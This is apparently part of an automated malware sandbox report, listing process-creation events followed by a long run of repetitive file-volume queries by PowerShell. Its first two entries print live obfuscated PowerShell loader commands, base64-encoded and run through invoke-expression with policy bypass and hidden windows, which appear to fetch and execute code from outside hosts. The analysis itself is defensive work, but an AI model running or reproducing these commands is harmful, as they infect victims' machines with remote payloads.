                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $alastrar = 'jgvzdhjlbgvqyxigpsanahr0chm6ly8xmde2lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1ivfvhx0v5cnveujbpqvpimehisnllcfvywfn2rl9pnmo4yndlvgvxqkn1mtl4y2jquu41vgtzytrprzbncwnjcvdotgxnjnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjc5ndm1nmexzmy2yyanoyrhbwjpz3vpzgfkzsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgvudhjhzgfuagegpsakyw1iawd1awrhzguurg93bmxvywreyxrhkcrlc3ryzwxlamfyktskym9ybmvjbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrlbnryywrhbmhhktskbglxdwlkawzpy2fyid0gjzw8qkftrty0x1nuqvjupj4noyrwaw50b3jhid0gjzw8qkftrty0x0vord4+jzsky2hvdxzpcia9icrib3juzwnvlkluzgv4t2yojgxpcxvpzglmawnhcik7jgltbwvyz2lyid0gjgjvcm5ly28usw5kzxhpzigkcgludg9yysk7jgnob3v2axiglwdlidaglwfuzcakaw1tzxjnaxiglwd0icrjag91dmlyoyrjag91dmlyics9icrsaxf1awrpzmljyxiutgvuz3rooyrmcnv0awzpy2fyid0gjgltbwvyz2lyic0gjgnob3v2axi7jgj1c3nvbgnvid0gjgjvcm5ly28uu3vic3ryaw5nkcrjag91dmlylcakznj1dglmawnhcik7jhf1aw5py2egpsatam9pbiaojgj1c3nvbgnvllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcridxnzb2xjby5mzw5ndggpxtskymvpcmftzsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhf1aw5py2epoyrzywlkb3igpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrizwlyyw1lktskzw5nb3jkdxjhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrlbmdvcmr1cmfylkludm9rzsgkbnvsbcwgqcgndhh0lkfsru5mrvqvmtyzlzixljmyms41ndiumjcxly86chr0accsicckzgfkyw5ljywgjyrkywrhbmunlcanjgrhzgfuzscsicdhc3buzxrfy29tcglszxinlcanjgrhzgfuzscsicckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlcckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlccxjywnjgrhzgfuzscpkts=';$morfose = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($alastrar));invoke-expression $morfoseJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
